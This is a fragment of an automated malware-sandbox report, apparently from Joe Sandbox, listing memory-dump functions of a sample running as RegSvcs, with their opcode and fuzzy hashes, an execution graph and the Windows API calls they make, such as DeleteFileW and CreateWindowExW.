                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012AD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                                                        • Instruction ID: fe10be587888b007c5a38d6662418468528b8e0a6189df10f4dc1bf9fad838ae
                                                                                        • Opcode Fuzzy Hash: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                                                        • Instruction Fuzzy Hash: 29214671514208EFDB01DF98CAC0B26BBA5FB84324F60C66DE9094B657C37AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012AD006 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                                        • Instruction ID: a6c97783be22603693a32aa6bc9802ded76a8556a328c31105b4246d2312d2b7
                                                                                        • Opcode Fuzzy Hash: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                                        • Instruction Fuzzy Hash: 1221B0714483849FCB03CF24D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0129D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: b764bab9ad2111ec1927312e9b7676b66e75f7da5ebc5a371d0bd8106c990c28
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 4011DF76404284CFDF02CF48D5C4B56BF71FB94324F24C2A9D9090B256C33AE45ADBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012AD1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: 6cbf149e0b167613253fcf4347b9d45a4fff452cebfbc2f244c48e1e8f304eae
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction Fuzzy Hash: 2511BB75504284DFDB02CF54C5C4B15BFA1FB84324F24C6AAD9494B6A7C33AD40ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0129D745 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fdc28af10db42ed80af907f94a95c7268effc922166b3692b13c1843fa4d3735
                                                                                        • Instruction ID: a6effcd7c708a456252d34fe14b072f1cfee41800eb01af15d7c64ffb990e992
                                                                                        • Opcode Fuzzy Hash: fdc28af10db42ed80af907f94a95c7268effc922166b3692b13c1843fa4d3735
                                                                                        • Instruction Fuzzy Hash: 2F012B310183889AEB154EADCDC4BAFFFD8DF41324F08C52AEE080B286D279D840D6B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0129D744 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 25b74c97062ae38a9a8f4947e679781c067a95d18143c3e1845dc47e977bb7ac
                                                                                        • Instruction ID: 92a2da358d249ea959121c613026bab31e5d740d543347e25baceb0e7c842dc8
                                                                                        • Opcode Fuzzy Hash: 25b74c97062ae38a9a8f4947e679781c067a95d18143c3e1845dc47e977bb7ac
                                                                                        • Instruction Fuzzy Hash: C1F0C2710043849AEB158E1ACC88BA6FFA8EB41234F18C45AEE080B286C2799840CAB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:114
                                                                                        Total number of Limit Nodes:11
                                                                                        execution_graph 39055 5d32800 39056 5d32846 GetCurrentProcess 39055->39056 39058 5d32891 39056->39058 39059 5d32898 GetCurrentThread 39056->39059 39058->39059 39060 5d328d5 GetCurrentProcess 39059->39060 39061 5d328ce 39059->39061 39063 5d3290b 39060->39063 39061->39060 39062 5d32933 GetCurrentThreadId 39064 5d32964 39062->39064 39063->39062 39065 5d3f620 39066 5d3f63c 39065->39066 39067 5d3f692 39066->39067 39068 5d3f73c 39066->39068 39070 5d3f6ea CallWindowProcW 39067->39070 39071 5d3f699 39067->39071 39072 5d39eac 39068->39072 39070->39071 39073 5d39eb7 39072->39073 39075 5d3e279 39073->39075 39076 5d3de7c CallWindowProcW 39073->39076 39076->39075 39077 5d4e5e0 39078 5d4e626 GlobalMemoryStatusEx 39077->39078 39079 5d4e656 39078->39079 39080 5d32a48 DuplicateHandle 39081 5d32ade 39080->39081 39082 e0d01c 39083 e0d034 39082->39083 39084 e0d08e 39083->39084 39088 5d39eac CallWindowProcW 39083->39088 39089 5d3d0c8 39083->39089 39093 5d3e218 39083->39093 39097 5d3d0b7 39083->39097 39088->39084 39090 5d3d0ee 39089->39090 39091 5d39eac CallWindowProcW 39090->39091 39092 5d3d10f 39091->39092 39092->39084 39094 5d3e228 39093->39094 39096 5d3e279 39094->39096 39101 5d3de7c CallWindowProcW 39094->39101 39098 5d3d0c5 39097->39098 39099 5d39eac CallWindowProcW 39098->39099 39100 5d3d10f 39099->39100 39100->39084 39101->39096 38964 e50848 38966 e5084e 38964->38966 38965 e5091b 38966->38965 38969 5d316f8 38966->38969 38973 5d316e8 38966->38973 38970 5d31707 38969->38970 38971 5d31728 38970->38971 38977 5d30dc4 38970->38977 38971->38966 38974 5d31707 38973->38974 38975 5d31728 38974->38975 38976 5d30dc4 3 API calls 38974->38976 38975->38966 38976->38975 38978 5d30dcf 38977->38978 38981 5d3259c 38978->38981 38980 5d330ae 38980->38980 38982 5d325a7 38981->38982 38983 5d337d4 38982->38983 38986 5d35060 38982->38986 38991 5d3505f 38982->38991 38983->38980 38987 5d35081 38986->38987 38988 5d350a5 38987->38988 38996 5d35030 38987->38996 39000 5d35618 38987->39000 38988->38983 38992 5d35081 38991->38992 38993 5d350a5 38992->38993 38994 5d35030 3 API calls 38992->38994 38995 5d35618 3 API calls 38992->38995 38993->38983 38994->38993 38995->38993 38997 5d3560f 38996->38997 38998 5d3565e 38997->38998 39004 5d35204 38997->39004 38998->38988 39001 5d35625 39000->39001 39002 5d3565e 39001->39002 39003 5d35204 3 API calls 39001->39003 39002->38988 39003->39002 39005 5d3520f 39004->39005 39007 5d356d0 39005->39007 39008 5d35238 39005->39008 39007->39007 39009 5d35243 39008->39009 39014 5d35248 39009->39014 39011 5d3573f 39018 5d3aa60 39011->39018 39017 5d35253 39014->39017 39015 5d369c8 39015->39011 39016 5d35060 3 API calls 39016->39015 39017->39015 39017->39016 39021 5d3aa91 39018->39021 39022 5d3ab91 39018->39022 39019 5d35779 39019->39007 39020 5d3aadd 39034 5d3bfd8 39020->39034 39038 5d3bfc9 39020->39038 39021->39019 39027 5d3acd8 39021->39027 39030 5d3acd1 39021->39030 39042 5d3ad18 39027->39042 39028 5d3ace2 39028->39020 39031 5d3acd8 39030->39031 39033 5d3ad18 2 API calls 39031->39033 39032 5d3ace2 39032->39020 39033->39032 39035 5d3c003 39034->39035 39036 5d3c0b2 39035->39036 39050 5d3cec5 39035->39050 39040 5d3bfdb 39038->39040 39039 5d3c0b2 39039->39039 39040->39039 39041 5d3cec5 CreateWindowExW 39040->39041 39041->39039 39043 5d3ad1d 39042->39043 39044 5d3ad5c 39043->39044 39048 5d3afb1 LoadLibraryExW 39043->39048 39049 5d3afc0 LoadLibraryExW 39043->39049 39044->39028 39045 5d3af60 GetModuleHandleW 39047 5d3af8d 39045->39047 39046 5d3ad54 39046->39044 39046->39045 39047->39028 39048->39046 39049->39046 39051 5d3cec9 39050->39051 39052 5d3cefd CreateWindowExW 39050->39052 39051->39036 39054 5d3d034 39052->39054 39102 e57358 39103 e5739e DeleteFileW 39102->39103 39105 e573d7 39103->39105

                                                                                        Executed Functions

                                                                                        Function 05D327FB Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1002 5d327fb-5d3288f GetCurrentProcess 1007 5d32891-5d32897 1002->1007 1008 5d32898-5d328cc GetCurrentThread 1002->1008 1007->1008 1009 5d328d5-5d32909 GetCurrentProcess 1008->1009 1010 5d328ce-5d328d4 1008->1010 1012 5d32912-5d3292d call 5d329d0 1009->1012 1013 5d3290b-5d32911 1009->1013 1010->1009 1015 5d32933-5d32962 GetCurrentThreadId 1012->1015 1013->1012 1017 5d32964-5d3296a 1015->1017 1018 5d3296b-5d329cd 1015->1018 1017->1018
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D3287E
                                                                                        • GetCurrentThread.KERNEL32 ref: 05D328BB
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D328F8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 05D32951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 79cabf5f4fe8cd343d5b3ca159e01426d24354cfb974f2bf31f8edd9dbfa1818
                                                                                        • Instruction ID: ab450340b0d6f3e62b47cdc5f09225eb27a1bed451699b531c89466433327b9b
                                                                                        • Opcode Fuzzy Hash: 79cabf5f4fe8cd343d5b3ca159e01426d24354cfb974f2bf31f8edd9dbfa1818
                                                                                        • Instruction Fuzzy Hash: D25164B4D0030ADFDB14DFAAD549B9EBBF1EF48314F20845AE419A7360DB349984CB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D32800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1025 5d32800-5d3288f GetCurrentProcess 1029 5d32891-5d32897 1025->1029 1030 5d32898-5d328cc GetCurrentThread 1025->1030 1029->1030 1031 5d328d5-5d32909 GetCurrentProcess 1030->1031 1032 5d328ce-5d328d4 1030->1032 1034 5d32912-5d3292d call 5d329d0 1031->1034 1035 5d3290b-5d32911 1031->1035 1032->1031 1037 5d32933-5d32962 GetCurrentThreadId 1034->1037 1035->1034 1039 5d32964-5d3296a 1037->1039 1040 5d3296b-5d329cd 1037->1040 1039->1040
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D3287E
                                                                                        • GetCurrentThread.KERNEL32 ref: 05D328BB
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D328F8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 05D32951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 99c3628eeb847914ec5578330f3b8772acf7e4f170f6ace36e301df50784993f
                                                                                        • Instruction ID: 162ec1c5da9d528fecd907da289ad4805447972bc671efb5b08f06d26c82d5fe
                                                                                        • Opcode Fuzzy Hash: 99c3628eeb847914ec5578330f3b8772acf7e4f170f6ace36e301df50784993f
                                                                                        • Instruction Fuzzy Hash: E55144B4D0030ADFDB14DFAAD548B9EBBF1EF48314F20845AE419A7360DB349984CB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00E57350 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1557 e57350-e573a2 1559 e573a4-e573a7 1557->1559 1560 e573aa-e573d5 DeleteFileW 1557->1560 1559->1560 1561 e573d7-e573dd 1560->1561 1562 e573de-e57406 1560->1562 1561->1562
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E573C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2881286250.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_e50000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID: n
                                                                                        • API String ID: 4033686569-2013832146
                                                                                        • Opcode ID: 4edcfdb6d231a13ceae5f45aef672e9414cfe50caf8a28b2bf10f179c36a6520
                                                                                        • Instruction ID: fe07eb34e34dbf48fcfb55173574498640d46826894ab479eda876e00d6f166b
                                                                                        • Opcode Fuzzy Hash: 4edcfdb6d231a13ceae5f45aef672e9414cfe50caf8a28b2bf10f179c36a6520
                                                                                        • Instruction Fuzzy Hash: 992158B1C046598FCB10CFAAD5457EEFBB0EF48320F14856AD898B7240D378A954CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3AD18 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05D3AF7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 65e89e9871eab198669bbe4812492a8430d7dabfa96e4f8caf0121931c067ecd
                                                                                        • Instruction ID: a87d8088f475cb32e4dcdee3d04eaac6e3d500fa91f3ff302000e7d7309c4098
                                                                                        • Opcode Fuzzy Hash: 65e89e9871eab198669bbe4812492a8430d7dabfa96e4f8caf0121931c067ecd
                                                                                        • Instruction Fuzzy Hash: 9B811470A00B058FDB24DF29D45676ABBF1FF88304F10892AD48AD7B50DB75E949CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3CEC5 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 25cc356e31692ee276c9de05b22ea8b8a42a74a3568d7a82c12c046bb9d6586b
                                                                                        • Instruction ID: 2c9986a1d1611e4a416f60953cae21c6a9804c8cf5941d3f53c0a045cca5eb2b
                                                                                        • Opcode Fuzzy Hash: 25cc356e31692ee276c9de05b22ea8b8a42a74a3568d7a82c12c046bb9d6586b
                                                                                        • Instruction Fuzzy Hash: BE51E0B1C04249EFDF15CFA9C984ADEBFB6BF48314F14816AE818AB220D7719885CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3CF04 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 970b2c4c04b538a444272699e08bfe397a9c3845a8a3f64f3bd059e390f524da
                                                                                        • Instruction ID: 75ea46b43a71e9567a17fbfd93dc90c0e3ba355e39a713e25194f106137d93ea
                                                                                        • Opcode Fuzzy Hash: 970b2c4c04b538a444272699e08bfe397a9c3845a8a3f64f3bd059e390f524da
                                                                                        • Instruction Fuzzy Hash: 2D51DFB1D00349DFDB14DFA9C885ADEBFB6BF48350F64812AE419AB210D7719885CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 02228888eddc2718b386de2ddc8de70a061ea12abc81c178112d428cbc40012c
                                                                                        • Instruction ID: c58bfa3faffafd8563cb1ec22f9d7ca275325b77a683928e5e732f26f13aec40
                                                                                        • Opcode Fuzzy Hash: 02228888eddc2718b386de2ddc8de70a061ea12abc81c178112d428cbc40012c
                                                                                        • Instruction Fuzzy Hash: 8B41CEB1D00309DFDB14DFA9C885ADEBBB6FF48350F64812AE819AB210D7719885CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3DE7C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05D3F711
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: d65193facac6da4221bd57b01c6bf5f428479fafd98787dfa91969b8c4adb20f
                                                                                        • Instruction ID: 50ac78fb235e49b1220ba05caa590376d4e89e54b7f455f46a11c30e22e011e4
                                                                                        • Opcode Fuzzy Hash: d65193facac6da4221bd57b01c6bf5f428479fafd98787dfa91969b8c4adb20f
                                                                                        • Instruction Fuzzy Hash: 9C411BB5A0030ADFCB14DF59C449AAABBF5FF88314F24C459D559AB321D774A841CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D32A40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D32ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 9ec2a40b45c74b392a497bdba89da14b91b5c89551ab00db2b7fa0e05305fd3b
                                                                                        • Instruction ID: af88946af8bc6b661bac5c7aeabb4b64dd1c3f1c5534cc14f3d1e75a8bc829d8
                                                                                        • Opcode Fuzzy Hash: 9ec2a40b45c74b392a497bdba89da14b91b5c89551ab00db2b7fa0e05305fd3b
                                                                                        • Instruction Fuzzy Hash: 312112B5D00208DFDB10CFA9D584ADEBBF5FB08320F14801AE818A7310D378A940CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D32A48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D32ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 44b1034235f1a2c82b4114da9f749977426c0714df3ab68d48aa21a99565b8c8
                                                                                        • Instruction ID: ffdbfb6fc23202561fbbabd8d58b7e9bfe3f5493922989a7a0a95d68fdc6350d
                                                                                        • Opcode Fuzzy Hash: 44b1034235f1a2c82b4114da9f749977426c0714df3ab68d48aa21a99565b8c8
                                                                                        • Instruction Fuzzy Hash: 6621E2B5D002099FDB10CFAAD984ADEBFF9FB48320F14801AE958A7310D374A940CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00E57358 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E573C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2881286250.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_e50000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: d2310ea2a499e9c7086cf8d4fab80982b8dbdc07c939b96d5d3e55455b8f54fa
                                                                                        • Instruction ID: 666885c5878054a18a8b33a5bd5a3b204010c7ae89d3098aa876faa832eca1e9
                                                                                        • Opcode Fuzzy Hash: d2310ea2a499e9c7086cf8d4fab80982b8dbdc07c939b96d5d3e55455b8f54fa
                                                                                        • Instruction Fuzzy Hash: 9B1133B2C0461A9BCB10CF9AD545BAEFBB4EF48320F10852AD858B7240D378A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D39D10 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05D3AFF9,00000800,00000000,00000000), ref: 05D3B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: dd8c3655155d39b6722e2f0ce9e4ac41a05a36e039bc452b52177650aed41b59
                                                                                        • Instruction ID: f435b6f013b4ffcd278abbf9c6720aac5c05fcb408dd495832000893564395c5
                                                                                        • Opcode Fuzzy Hash: dd8c3655155d39b6722e2f0ce9e4ac41a05a36e039bc452b52177650aed41b59
                                                                                        • Instruction Fuzzy Hash: 4C1112B69043099FDB10CF9AC844AEEFBF5EF88320F10842AE459A7210C375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3B179 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05D3AFF9,00000800,00000000,00000000), ref: 05D3B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 07260fc4d83eb249e58022506384f3301d9506a9c09c8d73957b981214ba04e8
                                                                                        • Instruction ID: 85bfe0450f8b4193203e2940900dccb16d50f04a7cc9460c749ab76ed73b7140
                                                                                        • Opcode Fuzzy Hash: 07260fc4d83eb249e58022506384f3301d9506a9c09c8d73957b981214ba04e8
                                                                                        • Instruction Fuzzy Hash: 221123B68043098FDB10DF9AC885AEEFBF5EF88320F14842AD459A7210C375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D4E5E0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 05D4E647
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2891053060.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d40000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 67894d1227410077e50103c67f8eea8708948d16fcad34d7c8d3ed895c51fd5d
                                                                                        • Instruction ID: 4f20986f1997d9744097c7e85fcbececbe6b638d30fe8755f5a2888e610e64a5
                                                                                        • Opcode Fuzzy Hash: 67894d1227410077e50103c67f8eea8708948d16fcad34d7c8d3ed895c51fd5d
                                                                                        • Instruction Fuzzy Hash: C01112B1C0025A9BCB10DF9AC444BDEFBF4FF48320F14812AD818A7240D378A940CFA5
                                                                                        Uniqueness

